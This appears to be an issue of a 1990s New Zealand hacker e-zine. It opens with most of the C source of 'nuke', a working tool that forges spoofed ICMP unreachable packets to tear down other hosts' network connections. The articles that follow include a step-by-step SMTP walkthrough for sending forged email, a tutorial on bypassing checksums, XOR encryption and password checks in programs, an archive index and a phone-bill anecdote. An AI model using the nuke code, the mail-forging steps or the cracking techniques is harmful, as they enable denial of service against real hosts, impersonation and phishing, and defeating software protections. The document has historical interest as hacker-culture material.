* ---------------------------------------------------------------- * I strongly advise against even compiling this software. It's far * too dangerous, and the temptation may be there to do some real * damage with it. Read and learn, that's it, eh? -concerned * ---------------------------------------------------------------- * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define DEFAULT_UNREACH ICMP_UNREACH_PORT char *icmp_unreach_type[] = { "net", "host", "protocol", "port", "frag", "source", "destnet", "desthost", "isolated", "authnet", "authhost", "netsvc", "hostsvc" }; #define MAX_ICMP_UNREACH (sizeof(icmp_unreach_type)/sizeof(char *)) int resolve_unreach_type(arg) char *arg; { int i; for (i=0; i sin_family = AF_INET; if (inet_addr(host) == -1) { ent = gethostbyname(host); if (ent != NULL) { sa->sin_family = ent->h_addrtype; bcopy(ent->h_addr,(caddr_t)&sa->sin_addr,ent->h_length); return(0); } else { fprintf(stderr,"error: unknown host %s\n",host); return(-1); } } return(0); } in_cksum(addr, len) /* from ping.c */ u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), * we add sequential 16 bit words to it, and at the end, fold * back all the carry bits from the top 16 bits into the lower * 16 bits. 
*/ while( nleft > 1 ) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if( nleft == 1 ) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* * add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } int icmp_unreach(host,uhost,port,type) char *host,*uhost; int type,port; { struct sockaddr_in name; struct sockaddr dest,uspoof; struct icmp *mp; struct tcphdr *tp; struct protoent *proto; int i,s,rc; char *buf = (char *) malloc(sizeof(struct icmp)+64); mp = (struct icmp *) buf; if (resolve_host(host,&dest) <0) return(-1); if (resolve_host(uhost,&uspoof) <0) return(-1); if ((proto = getprotobyname("icmp")) == NULL) { fputs("unable to determine protocol number of \"icmp\n",stderr); return(-1); } if ((s = socket(AF_INET,SOCK_RAW,proto->p_proto)) <0 ) { perror("opening raw socket"); return(-1); } /* Assign it to a port */ name.sin_family = AF_INET; name.sin_addr.s_addr = INADDR_ANY; name.sin_port = htons(port); /* Bind it to the port */ rc = bind(s, (struct sockaddr *) & name, sizeof(name)); if (rc == -1) { perror("bind"); return(-1); } if ((proto = getprotobyname("tcp")) == NULL) { fputs("unable to determine protocol number of \"icmp\n",stderr); return(-1); } /* the following messy stuff from Adam Glass (icmpsquish.c) */ bzero(mp,sizeof(struct icmp)+64); mp->icmp_type = ICMP_UNREACH; mp->icmp_code = type; mp->icmp_ip.ip_v = IPVERSION; mp->icmp_ip.ip_hl = 5; mp->icmp_ip.ip_len = htons(sizeof(struct ip)+64+20); mp->icmp_ip.ip_p = IPPROTO_TCP; mp->icmp_ip.ip_src = ((struct sockaddr_in *) &dest)->sin_addr; mp->icmp_ip.ip_dst = ((struct sockaddr_in *) &uspoof)->sin_addr; mp->icmp_ip.ip_ttl = 179; mp->icmp_cksum = 0; tp = (struct tcphdr *) ((char *) &mp->icmp_ip+sizeof(struct ip)); tp->th_sport = 23; tp->th_dport = htons(port); tp->th_seq = htonl(0x275624F2); mp->icmp_cksum = 
htons(in_cksum(mp,sizeof(struct icmp)+64)); if ((i= sendto(s,buf,sizeof(struct icmp)+64, 0,&dest,sizeof(dest))) <0 ) { perror("sending icmp packet"); return(-1); } return(0); } void main(argc,argv) int argc; char **argv; { int i, type; if ((argc <4) || (argc >5)) { fprintf(stderr,"usage: nuke host uhost port [unreach_type]\n"); exit(1); } if (argc == 4) type = DEFAULT_UNREACH; else type = resolve_unreach_type(argv[4]); if ((type <0) ||(type >MAX_ICMP_UNREACH)) { fputs("invalid unreachable type",stderr); exit(1); } if (icmp_unreach(argv[1],argv[2],atoi(argv[3]),type) <0) exit(1); exit(0); } ---------------->8------------------------------------------------------------- Well, this is the smallest stuff I have, and I'm not gonna BORE you with kbyte's and kbyte's of source. SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Busted for nothing ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Okay, I am being forced to type this by gun-point.. okay, maybe not to that extreme, but it's pretty damn close! We accept no responsibility for the writing of this article... Can I say that? No, I guess not.. oh well, I tried... =) For months we were receiving hundreds of dollars worth of bills through Telecom for calls we didn't make. For example, a $300 phone call when I was on holiday - there wasn't anyone home, so how could someone have had a conversation if there wasn't anyone home to accept the phone call? [NOTE: There isn't a pill box located anywhere NEAR my house, so don't go screaming BEIGE BOXING!! - mind you, I had this weird dream that I had this cute little pill box with wires sticking out of it which was right outside of our house. Ohmigod, I think I must be going crazy... ANYway..] These were directed through NZ-Direct from the US. Strange that. No one had been over to the states recently and it hadn't stated that it was by using a calling card, so that option was out. 
So, that required a monthly scream at Telco about that, and eventually we stopped getting billed for such calls (which I doubt even existed anyway).

Okay, now that's just the TIP of the iceberg. How would you like to be "convicted" for a "crime" you didn't commit? Well, that's basically what happened. And it was such a PETTY crime at that. Try VMB hacking!

It all started when we discovered a little VMB and everyone else happened to find it too. What a coincidence.. *grin* Many of their boxes had the default passwords still attached to them *sigh*. It's pathetic the way some companies leave their systems so open and then blame someone else for "abusing their system" when all we did was look around. Someone had edited the voice prompts ['twasn't me, but you know who you are... *grin*] and _I_ ended up taking the blame... hmm.. Anyway, a few of us ended up being "interrogated" over this stupid prompt editing and leaving "abusive messages".

Anyway, the outcome was, I ended up being the only person accepting responsibility for the entire incident. That included me having to write two letters. Two copies of one letter - one copy to the guy who owned the VMB and the other copy to the head of Telco security "for scrutiny" - and another letter to the head of Wellington Telco security explaining the entire incident.

In the end, it was a waste of time not only for me - having to write two letters - that didn't count the FIRST letter explaining why I shouldn't have my phone line disconnected (they sent a letter to me saying that if I didn't respond within a month, or summink, they'd disconnect it anyway - bunch o' pricks, huh?).

In my final letter to the head of Wellington Telco Security, I reminded them of the hundreds of dollars worth of calls I had to complain about each month. FINALLY, something was actually done about it, and the hundred dollars worth of calls were credited to my account.
The stupid thing was that I didn't do a thing, and had to put up with all the crap that they threw at me. I also had my 3-way call cancelled.

In conclusion (they always said you have to include one in essays so I'd better get extra practice =) ), I'd just like to say that they're a bunch of dorks.

Oh, and the new telephone account layout really sucks too. [CyntaxEra Mature Mode: ON] *grin* In my opinion, it was better the way it was, but that doesn't matter, does it? It's probably cheaper for them to do it the new way. That would explain it all... =)

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^        Books 2 Read        ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

Title                                Author               Stars
=================================================================
The Fools Run ...................... John Camp            *****
Complicity    ...................... Iain Banks           ****
War Day       ...................... Strieber & Kunetka   *****
Blood Music   ...................... Greg Bear            ****?

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^ The SLi Archive Subject list ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

Okay, this is the list of all the file areas in the SLi archives. It's a direct copy of the "/pub/README.NOW!" file and is up to date as of the release date.

-sof-

Welcome to the SLi archives!

We hope your stay is, err, umm, "enlightening". The operator of this system takes no responsibility for how the information is used, BUT suggests STRONGLY you do NOT try ANYTHING, ANY of the files describe! Some acts depicted in the files held within this archive describe illegal or immoral acts. PLEASE use your commonsense when defining right from wrong.
This archive exists to be a library of information, to show people a different outlook on the world and, in truth, a different outlook on life to give them the opportunity to delve into the realms of adventure and knowledge - NOT to incite or teach people how to break the law.

Directories     Sub Directories    Description
---------------+------------------+-------------------------------------------
./ai                               Artificial Intelligence.
./anarchy                          Anarchy files, explosives etc. (Likely not to be here anymore as I'm against this kinda shit now)
./art                              Art.
                ansi               If I find ppl up'ing ANSI, I'll shoot them.
                ascii              Better than ANSI, I guess.
                vt-xxx             VT Animations at present.
./bbs
                bbs-adds           BBS adverts - numbers etc..
                au
                nz
                other
                uk
                usa
                misc
./busts                            Info on different busts.
./cc                               Info on credit/calling cards, ATMs etc.
./civil                            Civil liberties
./cons                             Conferences for H/P people - where when, what happened and confs to come.
./corewars                         Files for Core Wars.
./cryptography                     Encrypting and Decrypting.
./cyber                            The world of the Cyberpunk.
./eff                              Information on the Electronic Freedom Foundation - a US civil rights group.
./faq                              General Frequently Asked Questions.
./history                          A MUST to read you HAVE to read these files they are linked to other directories all over the SLi archive but they contain a history of different events in the H/P world.
./howto                            How-to Guides to misc computer related activities.
./incoming                         Incoming files.
./info                             These files are also contained in other places. In this archive but are here because they should be read and because in my opinion, they are important.
./internet                         Internet related files.
                irc                Internet Relay Chat [IRC] files.
                sites              Different FTP/TELNET sites.
./misc                             Just a lot of misc stuff with no real home.
                bible              Obviously, the Bible.
./mischp                           Misc Hack/Phreak files.
                cable              Files to do with Cable TV/SKY.
                lockpick           Lock-picking related files.
./music                            Music related stuff.
                lyrics             Lyrics for songs etc.
                misc               Misc music related files.
                mods               Electronic music - most powerpacked for Amiga.
                vocs               PC Sound files.
./nz                               New Zealand related files!
./passwds                          Password files for different systems. Please rename the password file to be "systemname-dd-mm-yy". ie. lamesystem-01-02-95.
./pharm                            Drug files (also probably going to be removed for the same reason as "anarchy")
./phreak                           Information on the Telephone System.
                box                Different phreaking "boxes".
                cellfone           Cellular Fones.
                countrycodes       Every Area/Country Code in the world.
                fone-fraud         Misc files on fone-fraud written by Telco/Schools.
                history            History of the Telefone
                misc               Misc Files.
                miscexe            Misc Executables.
                payfones           Payphone related files.
                pbx                Private Branch eXchanges [PBXs].
                standards          Different CCITT/Phone Standards.
                vmb                Voice Mail Boxes [VMBs].
./pirate                           Breaking the (c) protection of S/W.
                amiga
                crack
                coding
                ibm
                mac
./police                           Understand thy opposition
                misc               Miscellaneous files on the police.
./publications                     Different files from well-known authors or organisations.
                bruce_sterling     Includes The Hacker Crackdown and inside directories FSF_columns, catscan and interzone.
                david_faber
                denning
                john_gilmore       Includes inside directories Gilmore_v_NSA and inside that, Clipper_FOIA and ITAR_FOIA.
                john_perry_barlow
                kapor
                unsorted           Miscellaneous unsorted publications.
./security                         Computer Security, Bug fixes and security hole descriptions.
                8lgm               Unix bugs
                cert               Computer Emergency Response Co-ordination Centre.
                cert_advisories    A LOT of system security holes
                clippings          Misc clippings from different usenet sources.
                misc               Misc info.
                dos                DOS security files.
                novell             Novell netware.
                tools              Misc tools for DOS.
                faq                Frequently Asked Questions.
                mac                Misc files for the Macintosh.
                misc               Misc files on Computer Security.
                os2                Files for OS2.
                unix               Files for UNIX based OS's.
                antihacktools      Anti-Hacker Tools
                hackerssrc         Various source for you hackers.
                hp                 Files for hacking the Hewlett-Packard's HPX000's.
                vax                Vax/Digital/VMS Security.
                x.25               x.25 security holes
./sli                              Southern Lights inc. File Areas.
                articles
                interest           Files that are related to SLi and are an interest to the rest of the H/P world
                mags               The SLi Mags are stored here.
                warnings           READ any files in here!
./strange                          Weird files that should have no place to go :)
                occult             Stuff on the occult
                ufo                UFO files.
./system                           Files for different OS's.
                amiga
                asm
                utils
                dos
                linux
./txts                             Like misc really.
./usenet                           Files/Msgs from usenet.
./virus                            Virus Creators and virus code. Any anti-virus people feel free to use this info to create virus killers.
./words                            Word files.
./zines                            Electronic Mags.
                hpa                Hacking, Phreaking and Anarchy Mags.
                other              Don't fit anywhere.
                weird              Very weird.

TOTAL DISK SPACE USED: 79055Kbytes [compressed]
                       Approximately 200Meg [uncompressed].

As of recent times, we have been updating the system at 1-2 Meg per day. However, this cannot continue, as we have but 40Meg available disk space remaining, but if anyone is willing to donate an IDE drive, we will be most appreciative.

NOTE: The use of the word "removed" is being used as in "access to these files will be removed from normal access users".

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^         Fake Mail          ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

Well, I don't know WHY this is in here, but just in case you're interested and DIDN'T know how to send fake Internet E-Mail here is a step by step way to do it.

KEY: ignore []'s
     *'s are lines that you type

type "telnet [target.comp] 25" at $prompt.

Trying [target.comp]...
Connected [target.comp].
Escape character is '^]'.
220-[target comp] [Mailer/Version] ready at [date/time]
220 ESMTP spoken here
*helo [where.from.comp]
250 [Target.comp] Hello [where.from.comp] [###.###.###], pleased to meet you
*mail from: [where@ever.you.like]
250 [where@ever.you.like]... Sender ok
*rcpt to: [target@target.comp]
250 [target@Target.comp]... Recipient ok
*data
354 Enter mail, end with "." on a line by itself
*hello
*.
250 DAA28466 Message accepted for delivery
*quit
221 [Target.Comp] closing connection
Connection closed by foreign host.
$

Well there you have it. Nice and easy. If you didn't know it already, I'm a bit disappointed, but that's what we are here for. To teach YOU.

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^ Elements of Data Deprotection ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

Elements of Data Deprotection - by Thorium

Data Deprotection is one of my many hobbies. Others include bomb making, programming, hacking, shooting, phreaking and appearing in court. I am by no means an expert in this field, in fact I would regard myself as a "seasoned amateur". However, I feel that some tips I have picked up over the years could help others. For this reason I am writing this file.

HOLD IT! You can't program? Well, this won't be much good to ya. You might even need to know some assembler on whatever platform you use. I use Amigas usually (because they are simply the best personal computer - well for assembler programmers anyway) so I know a fair bit of 68000 assembler. It also helps to know a few common opcodes (what the actual text of assembler language gets turned into, ie machine language) and how to use a good debugger and disassembler.

So, if you are up to here, you're half way to being a K-RAD ELITE DUDE anyway. In fact, you can probably do more interesting things than most who call themselves "K-RAD ELITE DUDE"s - so why are you reading this? That's right, you thought you might pick up a hint or two in an underground publication. Ok, I hope you learn something.

First: What do I mean "Data Deprotection" ??? This is probably not the best name for what I will actually describe, but it is all I could think of. I mean "getting into data" - but not in the sense of cryptanalysis and that sort of thing that requires a degree.
Data Deprotection has particular reference to breaking encryption algorithms, to getting around or breaking checksums and CRC's, and to making small but crucial changes to programs.

NOTE: Some people would call some uses of these skills "Cracking", and assume that you go around breaking the protection on games. This is distinctly possible, but before I go further, I would like to point out my personal feelings on breaking program protection:

If you "crack" a game and distribute it, you are killing the software industry. Anyway, you needed an original to crack - which someone had to buy - so whoever bought it is stupid if they pay for something then let everyone else have it.

Basically, I do crack games and things, but I don't spread what I do. The main reason for this is that I'm not good enough to keep up with the "big boys" in Europe who crack the latest game overnight. If I get hold of an original game, it is usually fairly old anyway, like a year or two, and even back then they had some pretty tricky protection that has taken a while to get around (like a few days work). Of course, there are those dead simple games (try Eye of the Beholder II for a beginners one). Thing is, everyone has it by the time I have finished with it. So I don't crack to spread. I hardly crack games at all, since my access to originals is limited. I crack only for the fun of it. And it is quite fun to pitch your mind against those of the programmers - kind of like chess play-by-purchase.

Anyway, that's my ideas on cracking games etc. If you want to, go ahead. It just kills the industry. This is why this article will deal as little as possible with things that could be used to crack games. It will deal more with accessing data from programs that you aren't really 'sposed to access.

So, you have this program. You have made whatever change to it for whatever reason, and it now comes up "corrupt data" or something along those lines.
Now, all you did was change a "Compare with password" to a "Don't do anything" - so you know it should be able to work fine.

To see if a checksum is your problem, try running the program in its original form from your debugger. Just straight running it. If it still comes up "error" then your debugger just ain't good enough, since it is not totally transparent to the program. It would require a discussion on each debugger to fix this, and I only know those that I use.

If it ran OK, try placing a breakpoint at the place where you change things and then running the program. Don't do anything at the breakpoint, just run the program. If it fails, chances are you have a checksum. If not, try putting the breakpoints around the place you changed, and after they break, put them back. If it fails, it's probably some sort of check. If not, something weird is happening.

The reason behind this is that almost all debuggers will use breakpoints that actually change the memory that you place a breakpoint on. So when a program goes to check its memory, if there is a breakpoint there, it won't find what it thought it would.

So, your program has a checksum? If not, you will need to do a little more hacking to find out what's up. It usually ain't too hard, but beyond the scope of this text.

Well, the next thing to do is FIND the checksum. This can be done by placing a breakpoint on your place to change. If you run it without putting the breakpoint back after it occurs and your program runs fine, then your check is AFTER the part you altered. If it fails, then the checksum is BEFORE the part you altered. Pretty simple really. You can further narrow this down by putting breakpoints at strategic points throughout the code, and watching what happens when you have a breakpoint in existence only up to there. You will eventually find the area of code that does the check.

Once you have found this piece of code, you can figure out what it does.
Chances are your program is in some form of compiled language, so won't be as easy to read as 100% assembler code, but by tracing through it, you can usually figure out what's up. The skill is to look for critical points in the code.

THERE WILL (almost) ALWAYS BE A COMPARE after any sort of checksum, whether it be a simple addition, or a complicated CRC. This compare will then have a conditional statement - this is the crux of it. All you do is remove the conditional and cover it with a constant - if it is supposed to branch if a certain value, make it branch always. If it branches only if NOT a certain value, make it a do-nothing set of instructions. Sometimes there will be more than one check of the value, so you must find all of them.

I feel I may have just skipped a vital idea. We changed the conditional rather than the compare value because we want all future attempts at this routine to be correct. This may be easier illustrated in, for example, a trainer mode for a game. It is better to make UNLIMITED lives by removing the conditional, than to have 9999999 lives - because you can still die. Also it is a lot easier to change back to its original form if you stuff up, because you only need write down the opcodes, not the constant.

Now you have just gotten around a check in the program. There may be more, and they may be hidden. So just test your program for full functionality. Insert your original alteration, and test again. If you still have problems, try this again. There could be multiple checks, checks on checks, and all sorts of stuff.

You will notice now that the "difference" between your original program and the altered one will only be a few key bytes. However it is how these key bytes are placed that is important. This is only one skill of many you will pick up as a hacker / cracker, but one of the most used.
And now to make this entire section useless, I shall tell you how to get around this type of hacking / cracking when you are on the programming end. MAKE YOUR CHECK VARIABLES DO SOMETHING. If you calculate the CRC or some vital code, don't just compare it, use it as a relative pointer into a data segment. If the CRC is wrong, your system crashes. It's best to not even COMPARE it, as this means you have the correct value sitting there. Just assume it is right, and have the checksum or CRC or whatever in your initialization code, but don't use it till much later on. This way your hacker will likely give up.

And to make that useless - how to crack programs that use this technique (gee, get the feeling every crack leads to a fix, and every fix leads to a crack?). Just debug the program, figure out the correct value for the CRC or whatever, and hard-code that in! Wipe over the CRC routine with one that sets any variables it was supposed to correctly. Chances are it will take up less space anyway!

So, we have done "actually changing a program" from the point of view of making it run with changes. Now I shall cover (very basically) encryption and decryption.

Encryption is mostly used to keep things from prying eyes. Which is exactly what makes me want to break it. A program might have its datafiles stored encrypted to stop you getting unfair hints, or it might have some of its code encrypted that does some magical copy protection.

Essential to the breaking of codes with reference to programs, is that any program has all the code necessary to decrypt its data. PGP has all its code there in source form, what could be easier. However, this is where the first problem starts - the KEY. If you know the key, you really don't need to be reading this. If you don't know the key, you have to break the algorithm. This is where it gets hard.
PGP is more or less unbreakable, because it uses a complicated algorithm and a complex and constantly changing key (different for each person). However most programs use only 1 key, and that is usually stored within the program itself.

The simplest of routines is that you get all your data, and logically NOT it, ie all 1's become 0's and all 0's become 1's. For this simple system, the algorithm IS the key. All you do is reverse the algorithm, ie run it over again, and out comes your data.

Another logical operator, Exclusive-OR (sometimes referred to as EOR or XOR), is commonly used. This is easiest thought of as a "selective not" - where each bit in the "key" (source) says whether each bit in the destination should be "NOT"'d. If the key bit is a 1, it is. So a key of 1010 and a dest of 1001 would become 0011. This is also a reversible algorithm, so all you do is run it over again.

EOR has the advantage as an algorithm with a "key" component. The KEY can be difficult to guess, especially if it is more than 1 byte. However there are ways to get around it. First, see if the program uses a fixed key - ie debug / disassemble it and see. If so, there you have it. A little playing around and you have your data.

This brings me to the next main point of this article - finding the EOR key if you don't have one. This is actually really easy - all you need to do is know some of the data that is after the EOR, and the length of the Key. The length of the key can usually be determined from the algorithm, if it is a continuous loop of EOR'ing a byte with some data, the key is a byte. If it is going through a reference table (and you can't just dig this table up) then you have to figure out how long it is. You also need to know at least one keylength of decrypted data.

What you do is rely on the fact that 1010 EOR 1001 = 0011 and also 0011 EOR 1001 = 1010 - in other words, the key acting on the cypher yields the data, and the data acting on the cypher yields the key!
So all you do is write a small program that gets your data, and eor's it with the cypher, and you have the key. You can also build a key from some fragments of data by guessing what the data in between might be - if this is text, it is usually easy. Now you apply your key to the rest of the data. Simple!

However one problem is that you usually don't know where abouts in the cypher your data comes from - so the solution is to write a program that uses the data in every possible position in the cypher to yield every possible key, and then use that key on every piece of cypher, and see what comes out. This may take a while, and you need to be able to recognize the data in its correct form, easy if it's text, otherwise difficult.

Other common forms of encryption are addition / subtraction of constant or changing values, rotation of bits (either in byte, word, or larger blocks), and swapping blocks of data (be they bits, bytes or larger blocks). The important thing to remember is that the program itself has to be able to decrypt the data, so with enough care and patience you can find that bit and copy it. Remember also that there can be more than one level of encryption, and different sets of algorithms for different blocks of data.

The final thing I wish to deal with is the topic of "One Way Encryption" - it is used sometimes to create keys for the above checks and decryption. It is also useful if you can break the algorithm to make an automatic password generator for encrypted files from a given program...

This situation is actually very common. It is a real pain. However, you spot an algorithm that creates the key, possibly from a password! Now, somehow a password of any length is "shrunk" or "expanded" to fit a given key length, and this is used to decrypt the data. This is called "One Way" encryption, and is commonly used on passwords.
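The EOR passage above, worked through as an added example (not code from the article): it shows why a repeating EOR key gives no confidentiality once one key-length of plaintext is known, even when the position of that known text is not. The key, the data file contents and all function names are constructed for illustration.

```python
from itertools import cycle


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """EOR every byte of data with the key, repeating the key as needed."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def key_from_crib(cipher: bytes, crib: bytes, offset: int, key_len: int):
    """Assume `crib` is the plaintext at cipher[offset:].

    cipher EOR plaintext = key, so each known byte fixes one key position.
    Returns the implied key, or None if two known bytes disagree about the
    same key position or some key position is never covered.
    """
    key = [None] * key_len
    for i, known in enumerate(crib):
        pos = (offset + i) % key_len
        guess = cipher[offset + i] ^ known
        if key[pos] is None:
            key[pos] = guess
        elif key[pos] != guess:
            return None          # contradiction: the crib is not at this offset
    if None in key:
        return None              # crib shorter than one key length
    return bytes(key)


def is_printable(data: bytes) -> bool:
    """Recognise 'data in its correct form' for the easy case: plain text."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def recover_keys(cipher: bytes, crib: bytes, key_len: int) -> dict:
    """Slide the crib over every offset; keep keys that decrypt to text."""
    found = {}
    for offset in range(len(cipher) - len(crib) + 1):
        key = key_from_crib(cipher, crib, offset, key_len)
        if key is not None and key not in found:
            plain = xor_repeat(cipher, key)
            if is_printable(plain):
                found[key] = plain
    return found


# Constructed sample: a 4-byte key and a made-up data file.
SAMPLE_KEY = bytes([0x5A, 0xC3, 0x17, 0x88])
SAMPLE_PLAIN = b"LEVEL=07;SCORE=004200;NAME=PLAYER1;HINT=LOOK UNDER THE MAT"
SAMPLE_CIPHER = xor_repeat(SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == "__main__":
    # Only the cipher text, the key length and the guess "SCORE=" are used.
    for key, plain in recover_keys(SAMPLE_CIPHER, b"SCORE=", 4).items():
        print(key.hex(), plain.decode())
```
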
The key created has little bearing to the original password, and can't be recovered because there is usually a "loss of significance" of data. The simplest way to explain is to use the simplest one-way algorithm. Just add all the bytes of a string together, in a byte. This way you are bound to get overflow, rendering some data lost. However you end up with a byte to use, and it will be a byte regardless of the length of the password.

So, if you can't get the password back, how do you pass the test? Simple - you create a "garbageword". This is something that is functionally the same as the password, but not actually the password. It is gained by reversing the algorithm given the result.

In this simple algorithm all you do is get your byte key, and subtract as many "A"'s as possible from it. Say your key was hex $BC (which incidentally is the byte sum of the letters 'keys'). You can subtract 'A' (hex $41) from it 2 times, leaving hex $3A, which is ':' which may not be liked by our algorithm if it only takes text, so we find how much we have to TAKE OFF it to get a letter or number. The closest number is '9' just below it, so we use that, and add the extra 1 to one of the 'A's. Therefore our garbageword is now 'AB9' - this is functionally the same as 'keys' for this algorithm, and so we have broken the lock.

You will hardly ever get an algorithm as simple as this one, but _ANY_ one way encryption can be made to yield a garbageword given the key if you devote enough time to it.

And how do you stop this sort of breaking of your algorithms? Easy - make it so complex that a hacker will never want to break it. - remember your algorithm will always yield the same key with the same input, so you don't have to understand what you have written, you just need to check that it makes different keys.
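The byte-sum "one way" check and its garbageword, as an added example (not code from the article), set beside a salted PBKDF2-HMAC-SHA256 verifier from Python's standard library. PBKDF2 is a swapped-in modern construction the article does not mention; the alphabet, round count and function names are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
import string

# Assumption: the password prompt accepts upper-case letters and digits only.
ALPHABET = (string.ascii_uppercase + string.digits).encode()
ROUNDS = 100_000  # assumed PBKDF2 iteration count for the illustration


def byte_sum(password: bytes) -> int:
    """The article's simplest one-way function: add all bytes into one byte."""
    return sum(password) & 0xFF


def weak_verify(password: bytes, stored_sum: int) -> bool:
    """A check that stores only the byte sum of the real password."""
    return byte_sum(password) == stored_sum


def garbageword(target: int, alphabet: bytes = ALPHABET, max_len: int = 8):
    """Shortest printable string whose byte sum is `target` (mod 256).

    Breadth-first search over the 256 possible sums: with only one byte of
    state, every reachable value is found after a handful of characters.
    """
    target &= 0xFF
    reached = {}
    frontier = {0: b""}
    for _ in range(max_len):
        nxt = {}
        for total, word in frontier.items():
            for ch in alphabet:
                t = (total + ch) & 0xFF
                if t not in reached and t not in nxt:
                    nxt[t] = word + bytes([ch])
        if target in nxt:
            return nxt[target]
        reached.update(nxt)
        frontier = nxt
    return None


def make_verifier(password: bytes, salt: bytes = None):
    """Hardened form: store a random salt and a slow, wide digest."""
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password, salt, ROUNDS)


def verify(password: bytes, salt: bytes, digest: bytes) -> bool:
    """Recompute the digest and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password, salt, ROUNDS)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    stored = byte_sum(b"keys")                # $BC, as in the article
    word = garbageword(stored)
    print(hex(stored), word, weak_verify(word, stored))
    salt, digest = make_verifier(b"keys")
    print(verify(b"keys", salt, digest), verify(word, salt, digest))
```

The weak check accepts every string with the right sum because its output space is 256 values; the PBKDF2 verifier has a 256-bit output and a per-password salt, so a string that merely matches the byte sum is rejected.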
For example, try to break one that rotates a 2-byte key storage by the lowest 4 bits of a letter to the right, then adds the letter, then rotates left by the upper 4 bits, and EOR's the letter. This is not actually _THAT_ hard to create a reverse algorithm for, it is just very hard to create a printable garbageword. And as long as you make your entry of the password only take printable letters, it will be hard to beat. And you have a 1 in 65535 chance of fluking it. But by using a slightly more complicated algorithm and 4 bytes of data, you would have a 1 in 4294967294 chance.

And an even "trickier" one to break is the algorithm in PowerPacker encrypted executable files. Nico has thought it out well. You type in a password, and it calculates a word to compare and tell you if the password is valid, but uses a totally separate algorithm to generate a longword for the actual decryption key - so any garbageword you make from the compare word is only going to have a 1 in 65535 chance of being correct... Makes things a little difficult, eh? And to make it harder the only encrypted stuff is the actual crunched data - which seems to be crunched differently than with no password as well, so I can't think of any way, short of formal cryptanalysis, to get around it.

Well, that's about it from me, but this is only the tip of the iceberg of what there is to learn before you are even a half-competent hacker in these here parts... But they are 3 important things that will lead to much more.

* Data wants to be free - so help it out *

                 SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^       Review: 'ToT'        ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
         Southern Lights inc.

REVIEW: 'Tricks of the Trade' [ToT]

This is the first review that we will be including in the SLi Magazine, but we hope to expand to reviewing a few others in the future.

[PLEASE NOTE: This is a critical review.
Some have said it has been a little too critical, perhaps that is the case, but the decision is to be left to you, the reader.]

[BRIEFING]

WHAT?  Electronic Magazine.

WHO?   Distributed by: Raider.
       Content by : Hype, Red Lion, Mutant-X, GreyRat, Nick, Demogordon, X-Treme and Kevin.

WHEN?  24th December 1994

WHERE? Written by a group of Wellington H/P/A's. Perhaps a couple of members out of the Wellington region seeming that at present I am unable to pin-point the locations and identities of a couple of the 'ToT' writers.

WHY?   This question stumped me for a while as I can only give my opinion. I came up with the following - a) for the pure reason to educate others coming up in the H/P/A scene, b) to give 'SLi' a taste of competition (this could be fun!) or maybe even, c) to get a bit of the limelight. These are in order of my suspicions from 'A' being the most likely, to 'C' being the least likely.

HOW?   Thought it was pretty damn obvious, but for those of you who are interested... They got each of the writers to write their articles down on paper then gave them to the editor to type out on his dinky li'l 'puter...

[Editor's Note: This seems to be the most TIME wasting story I've EVER heard BUT that's what they did, so 'Raider' said. ]

[CRITICAL REVIEW]

This magazine isn't too bad for the first couple of issues, but admittedly, the first issue had a little more to be desired.

The idea of there being a variety is 'okay', but that depends on the individuals of which the magazine was/is designed for. In my opinion, it appears that 'ToT' is designed with the lesser educated in the H/P/A scene in mind.

There were quite a number of articles in the second issue of 'ToT' in comparison to any of the 'SLi' issues, but the articles in 'ToT' were fairly brief and the ideas were a little out-dated.
It appears that 'ToT' is still in the process of deciding where it wants to go - it would've been a better idea if plans had been made earlier and those decisions would've made the foundation to start off with.

With 'SLi', all the needy decisions had been made PRIOR to even STARTING the magazine. 'SLi' was a group of companions FAR before it was a magazine - It's advisable to know who's going to be there when you need them and whether they can be trusted or not. The only way you can find out is by experimentation. And that's what we did.

Anyway, going back to 'ToT' and its purpose in the H/P/A scene... After a good read throughout the magazine, I noticed that there is a fair deal of information dealing with the Australian telephone network. It may do a good job there, but WHO are the main people who are most probably going to make use of the information stored within the bits and bytes? I may be wrong, but I would say it would be us 'kiwi H/P/A's' who would benefit most from the information.

